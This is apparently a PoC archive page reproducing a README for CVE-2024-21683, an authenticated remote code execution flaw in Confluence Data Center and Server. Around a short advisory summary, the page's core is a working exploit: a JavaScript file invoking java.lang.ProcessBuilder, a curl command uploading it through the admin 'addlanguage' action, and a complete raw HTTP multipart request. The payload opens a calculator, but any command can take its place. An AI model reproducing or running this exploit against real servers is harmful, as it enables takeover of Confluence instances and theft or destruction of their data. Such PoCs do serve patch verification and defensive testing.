Associated Vulnerability
Title:Atlassian Confluence 安全漏洞 (CVE-2024-21683)Description:This High severity RCE (Remote Code Execution) vulnerability was introduced in version 5.2 of Confluence Data Center and Server. This RCE (Remote Code Execution) vulnerability, with a CVSS Score of 7.2, allows an authenticated attacker to execute arbitrary code which has high impact to confidentiality, high impact to integrity, high impact to availability, and requires no user interaction. Atlassian recommends that Confluence Data Center and Server customers upgrade to latest version. If you are unable to do so, upgrade your instance to one of the specified supported fixed versions. See the release notes https://confluence.atlassian.com/doc/confluence-release-notes-327.html You can download the latest version of Confluence Data Center and Server from the download center https://www.atlassian.com/software/confluence/download-archives. This vulnerability was found internally.
Description
This vulnerability could allow an attacker to take complete control of a vulnerable Confluence server. This could allow the attacker to steal data, modify data, or disrupt the availability of the server.
Readme
# -CVE-2024-21683-RCE-in-Confluence-Data-Center-and-Server
This vulnerability could allow an attacker to take complete control of a vulnerable Confluence server. This could allow the attacker to steal data, modify data, or disrupt the availability of the server.
## Poc
* Create a JavaScript file and give it a name (exploit.js) and put the following line
```
new java.lang.ProcessBuilder["(java.lang.String[])"](["calc.exe"]).start()
```
And send the request to upload a new language through the command
```
curl -X POST http://[IP_address]:8090/admin/plugins/newcode/addlanguage.action -H "Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvguW5DY0BuQ87x08" -F "atl_token=[atl_token]" -F "languageFile=@exploit.js;filename=exploit.js" -F "newLanguageName=RCE"
```
### OR This Request
```
POST /admin/plugins/newcode/addlanguage.action HTTP/1.1
Host: 127.0.0.1:8090
Content-Length: 512
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1:8090
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryvguW5DY0BuQ87x08
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.111 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1:8090/admin/plugins/newcode/save.action
Accept-Encoding: gzip, deflate, br
Accept-Language: ar,en-US;q=0.9,en;q=0.8
Cookie: [Your cookies ]
Connection: close
------WebKitFormBoundaryvguW5DY0BuQ87x08
Content-Disposition: form-data; name="atl_token"
[ atl_token ]
------WebKitFormBoundaryvguW5DY0BuQ87x08
Content-Disposition: form-data; name="languageFile"; filename="exploit.js"
Content-Type: text/javascript
new java.lang.ProcessBuilder["(java.lang.String[])"](["calc.exe"]).start()
------WebKitFormBoundaryvguW5DY0BuQ87x08
Content-Disposition: form-data; name="newLanguageName"
RCE
------WebKitFormBoundaryvguW5DY0BuQ87x08--
```
### If the vulnerability exploit is successful, the calculator opens on your device.
File Snapshot
[4.0K] /data/pocs/bcf34c54a9a753411ef497f7a287e1e50097ac1b
└── [2.2K] README.md
0 directories, 1 file
Remarks
1. It is advised to access via the original source first.
2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →